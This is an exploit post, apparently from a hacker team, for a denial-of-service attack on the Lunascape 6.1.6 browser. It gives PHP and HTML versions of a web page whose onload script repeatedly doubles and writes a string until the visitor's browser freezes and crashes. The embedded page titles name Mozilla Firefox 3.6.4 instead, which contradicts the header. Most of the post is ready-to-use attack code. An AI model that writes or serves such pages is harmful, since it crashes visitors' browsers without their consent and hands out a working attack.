|
##############################################################################
# [+]Title: [Lunascape Browser 6.1.6 Denial of Service Exploit]
##############################################################################
# [+] About :
##############################################################################
# Author : GlaDiaT0R
# Contact: the_gl4di4t0r[AT]hotmail[DOT]com or berrahal.ryadh[AT]gmail[DOT]com
# Team : Tunisian Power Team ( DarkGh0st.Net )
# Greetz : ALLAH ! , Boomrang_victim, Marwen_Neo, Alphanix, Zigma & my friends
##############################################################################
[+] : Save it at exploit.php or exploit.html and by launching this code the browser will not respond and it will crash .
[+] : Exploit
=====================
PHP
=====================
exploit.php
<?php
echo "<html><title>Mozilla Firefox 3.6.4 Denial of Service Exploit </title>\n";
echo "<script>\n";
echo "function junk()\n";
echo "{\n";
echo "var buff=\"A\";\n";
echo "for (i=0;i<787;i++)\n";
echo "{\n";
echo "buff+=buff+\"A\";\n";
echo "document.write(buff+buff);\n";
echo "}\n";
echo "}\n";
echo "</script>\n";
echo "<body onload=\"javascript:junk();\">\n";
echo "<font color=white>the_gl4di4t0r<font color=\"grey\">[AT]</font>hotmail<font color=\"grey\">[DOT]</font>com</font>\n";
echo "</body>\n";
echo "</html> \n";
echo "\n";
?>
=====================
HTML
=====================
exploit.html
<html><title>Mozilla Firefox 3.6.4 Denial of Service Exploit </title>
<script>
function junk()
{
var buff="A";
for (i=0;i<787;i++)
{
buff+=buff+"A";
document.write(buff+buff);
}
}
</script>
<body onload="javascript:junk();">
<font color=white>the_gl4di4t0r<font color="grey">[AT]</font>hotmail<font color="grey">[DOT]</font>com</font>
</body>
</html>
##############################################################
Notice: I'M MUSLIM
##############################################################
|